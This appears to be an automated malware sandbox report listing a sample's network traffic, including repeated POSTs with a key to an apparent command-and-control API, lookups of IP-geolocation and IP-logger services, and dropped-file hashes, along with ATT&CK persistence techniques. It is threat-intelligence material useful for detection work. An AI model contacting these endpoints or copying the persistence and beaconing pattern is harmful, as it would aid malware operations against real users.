96.17.179.201:80 http://e1.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTvkAFw3ViPKmUeIVEf3NC7b1ErqwQUWvPtK%2Fw2wjd5uVIw6lRvz1XLLqwCEgTb71q4OVLvrOAjsfa2O%2Fec4w%3D%3D http 521 B 862 B 6 3
HTTP Request
GET http://e1.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTvkAFw3ViPKmUeIVEf3NC7b1ErqwQUWvPtK%2Fw2wjd5uVIw6lRvz1XLLqwCEgTb71q4OVLvrOAjsfa2O%2Fec4w%3D%3D
HTTP Response
200 -
1.6kB 6.6kB 16 10
-
1.6kB 5.3kB 15 12
-
377 B 1.9kB 5 4
HTTP Request
GET http://survey-smiles.com/
HTTP Response
200 -
361.7kB 533.3kB 1053 1236
HTTP Request
GET http://uehge4g6gh.2ihsfa.com/api/fbtime
HTTP Response
200
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
HTTP Response
405
HTTP Request
POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
-
1.0kB 2.7kB 8 6
-
3.6kB 33.1kB 34 42
-
2.6kB 5.7kB 16 18
-
469 B 868 B 6 5
HTTP Request
GET http://www.iyiqian.com/
HTTP Response
200 -
2.8kB 20.7kB 31 32
-
793 B 2.6kB 6 5
-
793 B 2.6kB 6 5
-
839 B 2.6kB 7 5
-
3.5kB 7.3kB 21 18
-
1.5kB 1.6kB 10 6
-
11.8kB 224.9kB 151 200
-
1.7kB 5.1kB 14 15
-
156 B 3
-
208 B 4
-
535 B 858 B 7 6
HTTP Request
GET http://wfsdragon.ru/api/setStats.php
HTTP Response
200 -
260 B 5
-
639 B 2.1kB 9 8
HTTP Request
GET http://wfsdragon.ru/api/setStats.php
HTTP Response
200 -
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
1.5kB 8.2kB 17 13
-
66.0kB 1.7MB 1255 1249
-
1.5kB 8.2kB 17 13
-
1.5kB 8.2kB 17 13
-
1.4kB 8.3kB 16 14
-
208 B 4
-
156 B 3
-
104 B 2
-
72 B 158 B 1 1
DNS Request
19.177.190.20.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
158.240.127.40.in-addr.arpa
-
112 B 72 B 2 1
DNS Request
ip-api.com
DNS Request
ip-api.com
DNS Response
208.95.112.1
-
64 B 80 B 1 1
DNS Request
www.listincode.com
DNS Response
199.59.243.225
-
55 B 71 B 1 1
DNS Request
ipinfo.io
DNS Response
34.117.186.192
-
219 B 144 B 3 1
DNS Request
95.221.229.192.in-addr.arpa
DNS Request
95.221.229.192.in-addr.arpa
DNS Request
95.221.229.192.in-addr.arpa
-
73 B 126 B 1 1
DNS Request
192.186.117.34.in-addr.arpa
-
59 B 124 B 1 1
DNS Request
music-sec.xyz
-
58 B 90 B 1 1
DNS Request
iplogger.org
DNS Response
172.67.132.113
104.21.4.208
-
146 B 135 B 2 1
DNS Request
113.132.67.172.in-addr.arpa
DNS Request
113.132.67.172.in-addr.arpa
-
146 B 131 B 2 1
DNS Request
225.243.59.199.in-addr.arpa
DNS Request
225.243.59.199.in-addr.arpa
-
58 B 90 B 1 1
DNS Request
iplogger.org
DNS Response
172.67.132.113
104.21.4.208
-
140 B 94 B 2 1
DNS Request
3.171.2.186.in-addr.arpa
DNS Request
3.171.2.186.in-addr.arpa
-
142 B 95 B 2 1
DNS Request
1.112.95.208.in-addr.arpa
DNS Request
1.112.95.208.in-addr.arpa
-
216 B 137 B 3 1
DNS Request
201.178.17.96.in-addr.arpa
DNS Request
201.178.17.96.in-addr.arpa
DNS Request
201.178.17.96.in-addr.arpa
-
70 B 156 B 1 1
DNS Request
9.228.82.20.in-addr.arpa
-
120 B 165 B 2 1
DNS Request
x2.i.lencr.org
DNS Request
x2.i.lencr.org
DNS Response
173.222.13.40
-
124 B 107 B 2 1
DNS Request
www.facebook.com
DNS Request
www.facebook.com
DNS Response
163.70.147.35
-
60 B 165 B 1 1
DNS Request
x2.c.lencr.org
DNS Response
173.222.13.40
-
72 B 137 B 1 1
DNS Request
40.13.222.173.in-addr.arpa
-
60 B 159 B 1 1
DNS Request
e1.o.lencr.org
DNS Response
96.17.179.201
96.17.179.193
-
72 B 125 B 1 1
DNS Request
35.147.70.163.in-addr.arpa
-
509 B 8
-
72 B 137 B 1 1
DNS Request
201.179.17.96.in-addr.arpa
-
70 B 156 B 1 1
DNS Request
50.23.12.20.in-addr.arpa
-
142 B 157 B 2 1
DNS Request
43.58.199.20.in-addr.arpa
DNS Request
43.58.199.20.in-addr.arpa
-
58 B 74 B 1 1
DNS Request
humisnee.com
DNS Response
185.107.56.199
-
63 B 79 B 1 1
DNS Request
survey-smiles.com
DNS Response
199.59.243.225
-
73 B 134 B 1 1
DNS Request
199.56.107.185.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
167.109.18.2.in-addr.arpa
-
67 B 99 B 1 1
DNS Request
uehge4g6gh.2ihsfa.com
DNS Response
13.248.169.48
76.223.54.146
-
216 B 158 B 3 1
DNS Request
146.78.124.51.in-addr.arpa
DNS Request
146.78.124.51.in-addr.arpa
DNS Request
146.78.124.51.in-addr.arpa
-
183 B 215 B 3 3
DNS Request
www.iyiqian.com
DNS Request
www.iyiqian.com
DNS Request
www.iyiqian.com
DNS Response
34.143.166.163
DNS Response
34.143.166.163
-
62 B 107 B 1 1
DNS Request
www.facebook.com
DNS Response
157.240.221.35
-
65 B 107 B 1 1
DNS Request
secure.facebook.com
DNS Response
163.70.147.4
-
45.5kB 372.2kB 172 371
-
130 B 104 B 2 1
DNS Request
static.xx.fbcdn.net
DNS Request
static.xx.fbcdn.net
DNS Response
163.70.147.23
-
73 B 126 B 1 1
DNS Request
35.221.240.157.in-addr.arpa
-
71 B 121 B 1 1
DNS Request
4.147.70.163.in-addr.arpa
-
74 B 112 B 1 1
DNS Request
227.179.250.142.in-addr.arpa
-
73 B 112 B 1 1
DNS Request
74.169.217.172.in-addr.arpa
-
17.4kB 391.2kB 189 396
-
144 B 116 B 2 1
DNS Request
23.147.70.163.in-addr.arpa
DNS Request
23.147.70.163.in-addr.arpa
-
146 B 126 B 2 1
DNS Request
163.166.143.34.in-addr.arpa
DNS Request
163.166.143.34.in-addr.arpa
-
144 B 128 B 2 1
DNS Request
48.169.248.13.in-addr.arpa
DNS Request
48.169.248.13.in-addr.arpa
-
77 B 253 B 1 1
DNS Request
content-autofill.googleapis.com
DNS Response
142.250.200.42
142.250.200.10
216.58.201.106
216.58.204.74
172.217.169.10
142.250.179.234
142.250.180.10
142.250.187.202
142.250.187.234
172.217.16.234
142.250.178.10
-
5.3kB 21.8kB 28 33
-
174 B 74 B 3 1
DNS Request
facebook.com
DNS Request
facebook.com
DNS Request
facebook.com
DNS Response
163.70.147.35
-
73 B 112 B 1 1
DNS Request
42.200.250.142.in-addr.arpa
-
50 B 66 B 1 1
DNS Request
t.me
DNS Response
149.154.167.99
-
5.0kB 13.2kB 21 19
-
116 B 131 B 2 1
DNS Request
ninhaine.com
DNS Request
ninhaine.com
-
186 B 135 B 3 1
DNS Request
2makestorage.com
DNS Request
2makestorage.com
DNS Request
2makestorage.com
-
73 B 166 B 1 1
DNS Request
99.167.154.149.in-addr.arpa
-
232 B 233 B 4 3
DNS Request
nisdably.com
DNS Request
nisdably.com
DNS Request
nisdably.com
DNS Request
nisdably.com
-
58 B 131 B 1 1
DNS Request
aucmoney.com
-
59 B 132 B 1 1
DNS Request
thegymmum.com
-
95 B 168 B 1 1
DNS Request
fe0b449a-bcc8-4a3a-a035-53814b5092ca.ninhaine.com
-
65 B 138 B 1 1
DNS Request
atvcampingtrips.com
-
66 B 139 B 1 1
DNS Request
server2.ninhaine.com
-
189 B 136 B 3 1
DNS Request
kuapakualaman.com
DNS Request
kuapakualaman.com
DNS Request
kuapakualaman.com
-
126 B 136 B 2 1
DNS Request
renatazarazua.com
DNS Request
renatazarazua.com
-
60 B 133 B 1 1
DNS Request
nasufmutlu.com
-
66 B 139 B 1 1
DNS Request
server2.ninhaine.com
-
118 B 2
DNS Request
spolaect.info
DNS Request
spolaect.info
-
58 B 90 B 1 1
DNS Request
wfsdragon.ru
DNS Response
104.21.5.208
172.67.133.215
-
71 B 133 B 1 1
DNS Request
208.5.21.104.in-addr.arpa
-
144 B 158 B 2 1
DNS Request
88.156.103.20.in-addr.arpa
DNS Request
88.156.103.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
22.236.111.52.in-addr.arpa
-
62 B 173 B 1 1
DNS Request
tse1.mm.bing.net
DNS Response
204.79.197.200
13.107.21.200
-
139 B 1
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution: 1
Registry Run Keys / Startup Folder: 1
Create or Modify System Process: 1
Windows Service: 1
Scheduled Task/Job: 1
Downloads
-
Filesize 180B
MD5 4bc8a3540a546cfe044e0ed1a0a22a95
SHA1 5387f78f1816dee5393bfca1fffe49cede5f59c1
SHA256 f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca
SHA512 e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf
-
Filesize 975KB
MD5 2d0217e0c70440d8c82883eadea517b9
SHA1 f3b7dd6dbb43b895ba26f67370af99952b7d83cb
SHA256 d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01
SHA512 6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d
-
Filesize 897KB
MD5 f709715401ab7fe50bc780760bf9e3e5
SHA1 6d7193cfd1f546eda62a1609b9b8f52a72c3fc55
SHA256 721ddafd3417eb0cf0e57076265bb124fdf00e2debc13e8bb0a27c89fdc808d2
SHA512 6dfc5b0dea4a134271f7b36029d451259887d42334fb2ed6cf9c8adaef80370866f0e35e4f139225ac267f624c3ebf1e88cc75db2ab1a7baacf92ec84a8eb13a
-
Filesize 712KB
MD5 b89068659ca07ab9b39f1c580a6f9d39
SHA1 7e3e246fcf920d1ada06900889d099784fe06aa5
SHA256 9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c
SHA512 940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52
-
Filesize 381KB
MD5 5a8cac0f11af5d1f697fd4605b94340b
SHA1 26fc1b275094e6cf7926f82435463fca441e308a
SHA256 d9772558c0555b9e531e50af984ab64b4e38af2917712acf5d96caafec05ec76
SHA512 9f4d5c9247177bace98ddac536261f44e4301bdaf6ea03eb834855e65a1b65f27e295f56b2bd7145baa9321fc47b01d6dd0b41483ea89ee54427fed2ea92c311
-
Filesize 2.4MB
MD5 e8d7444ace76d0133904769a90eba8f7
SHA1 bcd825a99ac408b549bcdd39dad697375c3ec9b5
SHA256 f733fd9bf7666ad08e4307bb589cdf4dc3db443203db7d80ce1de8055f917597
SHA512 b1ea5a2611e5faad019a15f2c953d778f197400f21f62326010d9498fb321c6ed60081ae7607d3d3d17036c19bb997780ea0dbc95a2e329e06485a57fdc3b2a9
-
Filesize 1.9MB
MD5 4aea6c7f7ba606db6574190ff4748d39
SHA1 100b67ccd32baaa184fc2f675c274947985d1483
SHA256 ce727f7b573c110fbb6fdabf416800f2febd0733abfcbe18b102e4351aa95407
SHA512 4b63daa29178bb07e30a06715137718c7dbec1c02381a7736bfb6e76582d614c607d8284f71f3d18953760b29390cd839adb2311e51991fd4e58dce787b1699b
-
Filesize 92KB
MD5 f31ee2053b3957b3f4bc6ef8255370da
SHA1 3db7330f217f9edd664e7da4015f4c914251b82d
SHA256 65d41d6f881da0784a1c52a873db53569d64802f2cc77a55b170bb1b199870a4
SHA512 ef1d02a858a276b596d8ccb1cecf6c0aec04ab070570953d631178a3abb787422bd1860edf91cdf5a032e1ab914ad68e5967f15c80e071b076beda9c6921169e
-
Filesize 1.4MB
MD5 41b7c6d48d13e1a864bf2d3759e257e6
SHA1 7ee45121a927d744941651bd6673d3df21f1611b
SHA256 820c980f68378170cec0e1f2f4e2e319a07b1d030d7712ece110f579fcd1a8c2
SHA512 0ac230d6ea4f7eaf1c5dbc919e1de41416e4c5e527e0ec583135eab2067d0fcd22615d80a93f803ce327cdbb58b5b236ca47d759647b8c36a98a17a3e1504077
-
Filesize 381KB
MD5 10c4e134206eaeae9629258618e961c9
SHA1 1c98596001b3cee511b33f699011bd02e0ca619a
SHA256 78e19f3f017faffd6ed02b03b67b5dc6a521b1537aee0cc939c5b162a73bb799
SHA512 6b235bc2a438a56ee2e7d34510b805fb2e44f22b111cfdb0d6480c6aa50972d9bd847cd6cd8ceb50cce625a1d0b91696f12f8ad3e2393d70efa94838c30f2f3a
-
Filesize 201KB
MD5 b70f516d57624c741cabeebb65cce996
SHA1 98c27ae9fa2742dfedcf765c5b37d7830673c2ff
SHA256 32e4d190cebe0be41e148b8863fad2c8973b1afc9d60238ac9ec1daeb1e1a2d2
SHA512 aae21583810803053b0112f720c142de570b75c41d6bb63ae7e870750678478cc7140204c1108b83fee7f53de77e5de2a9752fdff0279563ceea94c2401acf95
-
Filesize 2KB
MD5 ab1253d04d3633af6804a6ff3c0c9904
SHA1 c2577e0ba6c2c17a6aa93f3d3d2a97e4dbda7eda
SHA256 378719b4004d6b4e63f0b01053d71d6c34657932304f4df41570da723e31d68c
SHA512 b53f0cf09c01be7a17ac665f064017db091abd25f2549fd2856a638b716dd430525ae7d42f178f5b8a9df00a9a8c17cecbed498272385b33150eaa71c20c2010
-
Filesize 874B
MD5 d34e174a8d8291f281221479e90ebb8a
SHA1 d1cc01aee3978d8418a910650ff4562c3554f712
SHA256 fd10a2cd968299619d9e44e55c52b04c9f684b02214a11be1dcff5a2f25f3a09
SHA512 3306bbdb8c227acefd5003aa0faa8eb3897ab2c24ae86c1d329aff39928c5bb7062d1feaeb2d4daf04b1a9346e150879b27aefa59e49e392b6dc83fa59b080fd
-
Filesize 225KB
MD5 7bf9b6e5588c88e1d00a1519f63e1e8a
SHA1 3dae75da7ac4402521d3ce9a5cc639c27a575914
SHA256 8ce458e431bcda749a998acacfb23def4f00e4665e8e63ad09071acd2f821980
SHA512 65ee05f087b5e403595811f1a2efcddbd1bbc80759b0a388c7b011c5698c0d3cae3abcbb428150db583ac4f6e51e31b1071fd52b910e555564aaf2e94f385f18
-
Filesize 51KB
MD5 0c290dfa9f665e3ef9bf334312e43965
SHA1 b047ed22c06fc98822d70a8e609d13deb3a88653
SHA256 f0de5c618a260fd6e6fe6b8ffc59bca5cf2dc9e4ef2bd73a05c71dd0f752f303
SHA512 0a0f6f32e1c6d0055af87866fa934fe338df81abf52c24c9cdaa3a8acecf1b22350cb3d8281f9cde1448390a96bc91ef3dd5c31a37050958018d11b4cdbf53e4
-
Filesize 214KB
MD5 1a1ea56ab621b6302509b15c30af87f3
SHA1 6249a3c2f4336a828d59b07724ae9983a3eef264
SHA256 5d3685c1a78ebb08d03a5de627bba9c55f0e7bfbd6d5efa61c6ad26d111bb2c4
SHA512 66a7c29bc1f0e573c24af632edf1250ae50517c37cd5d2560e0f8619ebb76f26137bd234f504501dd4a79ad7779a17e3e83951cb907f92174102fa3811d48a90